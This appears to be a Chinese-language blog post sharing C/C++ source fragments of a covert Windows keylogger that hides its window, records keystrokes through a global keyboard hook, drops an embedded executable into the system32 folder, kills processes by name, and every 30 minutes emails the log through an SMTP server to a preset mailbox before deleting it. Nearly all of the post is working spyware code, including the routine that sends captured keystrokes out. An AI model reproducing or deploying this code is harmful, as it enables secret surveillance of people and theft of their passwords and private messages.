功能如下,运行后自动隐藏界面,然后记录键盘,每隔30分钟会向预先设定的邮箱发一封记录邮件,功能还不是很完善。我就不把程序放上来了,就贴几段源代码吧。
1.TerminateProcessByName //根据进程名称结束指定进程
void TerminateProcessByName(CString processName)
{
HANDLE snapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//--------------------------------------
//查询进程
//--------------------------------------
PROCESSENTRY32 processInfo;
CString strProcessName= "";
DWORD nProcessID=0;
HANDLE processHandle;
int nProcessTerminate=0;
processInfo.dwSize=sizeof(PROCESSENTRY32);
//获取第一个进程
BOOL status=Process32First(snapShot,&processInfo);
while(status)
{
//获取进程名字
strProcessName = processInfo.szExeFile;
//查询比较是否为要结束的进程
if(processName.CompareNoCase(strProcessName)==0)
{
//获取进程ID
nProcessID=processInfo.th32ProcessID;
processHandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, nProcessID );
if(processHandle==NULL)
{
return;
}
//结束一个进程
TerminateProcess(processHandle,0);
}
//获取下一个进程
status=Process32Next(snapShot,&processInfo);
}
}
2. 实现指定资源文件的拷贝 //这段代码解决了全局钩子必须使用动态链接库这个问题
HANDLE hFile = CreateFile(
"C:\\WINDOWS\\system32\\picture.exe",
GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
HRSRC hrsrc=FindResource(NULL,MAKEINTRESOURCE(141),"Exe");
LPCVOID lp=LockResource(LoadResource(NULL,hrsrc));
DWORD fileSize=SizeofResource(NULL,hrsrc);
WriteFile(hFile,lp,fileSize,&writeSize,NULL);
CloseHandle(hFile);
3.SendMyMail //发送邮件
BOOL _declspec(dllimport) WINAPI SendMail(
LPCSTR smtpserver,
LPCSTR user,
LPCSTR password,
LPCSTR mailfrom,
LPCSTR mailto,
LPCSTR subject,
LPCSTR msgbody
);
BOOL _declspec(dllimport) WINAPI GetSmtpError(LPSTR strerrmsg);
void SendMyMail()
{
FILE* f=fopen("C:\\WINDOWS\\system32\\logforkeyboard.db","a+");
char buffer[2002];
fread(buffer,sizeof(char),2000,f);
fclose(f);
char* stserver="smtp.163.com";
char* user="***********";
char* pwd="**********";
char* sender="***********";
char* receiver="********@qq.com";
char* title="The log for keyboard";
char* body=buffer;
SendMail(stserver,user,pwd,sender,receiver,title,body);
remove("C:\\WINDOWS\\system32\\logforkeyboard.db");
}
4.KeyboardProc //关键的函数,键盘记录
LRESULT CALLBACK KeyboardProc(
int code, // hook code
WPARAM wParam, // virtual-key code
LPARAM lParam // keystroke-message information
)
{
if('U'==wParam&&(1==(lParam>>29 & 1)))
{
SendMessage(g_hWnd,WM_CLOSE,0,0);
UnhookWindowsHookEx(g_hKeyboard);
}
if (lParam& 0x40000000)
{
return CallNextHookEx(g_hKeyboard,code,wParam,lParam);
}
else
{
char c=getKeyText(wParam);
WriteToDbFile(c);
}
return CallNextHookEx(g_hKeyboard,code,wParam,lParam);
}